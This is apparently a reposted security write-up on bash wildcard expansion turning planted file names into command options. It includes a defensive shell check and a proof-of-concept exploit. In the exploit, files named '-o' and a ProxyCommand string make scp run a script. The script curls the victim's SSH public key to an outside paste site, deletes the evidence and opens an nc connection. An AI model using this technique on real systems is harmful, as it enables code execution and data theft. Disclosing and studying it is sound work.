The little crab who loves the little fox
Source: https://dicesoft.net/projects/wildcard-code-execution-exploit.htm
0x00 Wildcard
When you type "*" on a bash command line, bash expands it to the names of all files in the current directory and passes every one of them to the program as a separate argument. For example, rm * deletes all files in the current directory.
0x01 File names are taken as arguments
Most command-line programs are affected by this. For example, when the ls command is run with no arguments, the output looks like this:
$ ls
asdf.txt foobar -l
If you want to know which users and groups these files belong to, you can add the "-l" argument:
$ ls -l
total 0
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 -l
Notice that there is a file named "-l". Let's try "ls *" and see what happens:
$ ls *
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar
Unlike before, "ls *" does not list the -l file: the name -l is expanded by the shell and passed to ls as an argument, where ls parses it as the -l option.
The command is equivalent to running:
$ ls asdf.txt foobar -l
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar
0x02 Security Problem
This behaviour becomes a security problem when a command is run with a wildcard in its arguments inside a directory whose file names were not checked first: anyone who can create files in that directory can inject arguments into the command. This could be used to attack someone's computer.
This problem is well known and has been discussed on the Full Disclosure mailing list (seclists.org/fulldisclos…).
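As an added example that is not part of the original article (it assumes a POSIX sh and mktemp): a small check that lists option-like file names in a directory, counts how many wildcard-expanded arguments a getopt-style parser would read as options, and shows that expanding "./*" instead of "*" (or ending option parsing with "--") removes the problem.

```shell
#!/bin/sh
# Added example, not from the original article. Constructed demo directory
# mirrors the article's listing plus the "-o" file the scp scenario relies on.

# Expand pattern $2 inside directory $1 and print how many resulting arguments
# begin with "-", i.e. how many a getopt-style parser would treat as options.
count_option_like() {
    ( cd "$1" || exit 1
      set -- $2            # unquoted on purpose: let the shell expand the glob
      n=0
      for a in "$@"; do
          case "$a" in -*) n=$((n + 1)) ;; esac
      done
      echo "$n" )
}

# List names in directory $1 that start with "-": a check worth running before
# typing "cmd *" in a directory you do not control. Prints nothing if clean.
list_option_like() {
    for f in "$1"/-*; do
        [ -e "$f" ] || continue   # no match: the literal pattern comes back, skip it
        printf '%s\n' "${f##*/}"
    done
}

# Create a constructed demo directory and print its path.
make_demo_dir() {
    d=$(mktemp -d)
    for name in asdf.txt foobar -l -o; do : > "$d/$name"; done
    echo "$d"
}

demo=$(make_demo_dir)
echo "option-like names present:"; list_option_like "$demo"
echo "args parsed as options with '*':   $(count_option_like "$demo" '*')"    # 2
echo "args parsed as options with './*': $(count_option_like "$demo" './*')"  # 0
# "--" has the same effect when the program supports it: "ls -- *" lists "-l"
# as a file instead of treating it as an option.
rm -rf "$demo"
```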
0x03 Proof of Concept Exploit
To show that this behaviour can be turned into an arbitrary code execution attack, we target the scp command. scp accepts the -o option to pass SSH configuration options, and SSH has a configuration option (ProxyCommand) that runs a command; we use it to run our script.
Suppose we control a directory in which the victim will run the following command (imagine that the user has just downloaded the source code of a web application and is uploading it to their web server):
$ scp * <user>@<host>:/var/www/
For this to work, we place several files in the directory:
"-o": scp will take this file name as the -o option.
"ProxyCommand sh supercool.sh %h %p": scp will treat this file name as the argument to -o.
"supercool.sh": the script that will be executed.
"zzz.txt": a harmless test file.
The supercool.sh file contains the malicious commands:
#!/bin/sh
# Upload their SSH public key to the Internet, and put a scary message in /tmp/.
echo "By @DefuseSec and @redragonx..." > /tmp/you-have-been-hacked.txt
echo "This could have been your private key..." >> /tmp/you-have-been-hacked.txt
curl -s -d "jscrypt=no" -d "lifetime=864000" \
    -d "shorturl=yes" --data-urlencode "paste@$HOME/.ssh/id_rsa.pub" \
    https://defuse.ca/bin/add.php -D - | \
    grep Location | cut -d " " -f 2 >> /tmp/you-have-been-hacked.txt
# Delete evidence of our attack.
rm ./-o ProxyCommand\ sh\ supercool.sh\ %h\ %p
echo > ./supercool.sh
# Do what ProxyCommand is supposed to do.
nc -p 22332 -w 5 $1 $2
When the victim runs the command:
$ scp * <user>@<host>:/var/www/
supercool.sh
zzz.txt
When he checks his /tmp directory he will see:
$ cat /tmp/you-have-been-hacked.txt
By @DefuseSec and @redragonx...
This could have been your private key...
https://defuse.ca/b/QQ3nxADu
The full PoC archive can be downloaded here: poc.zip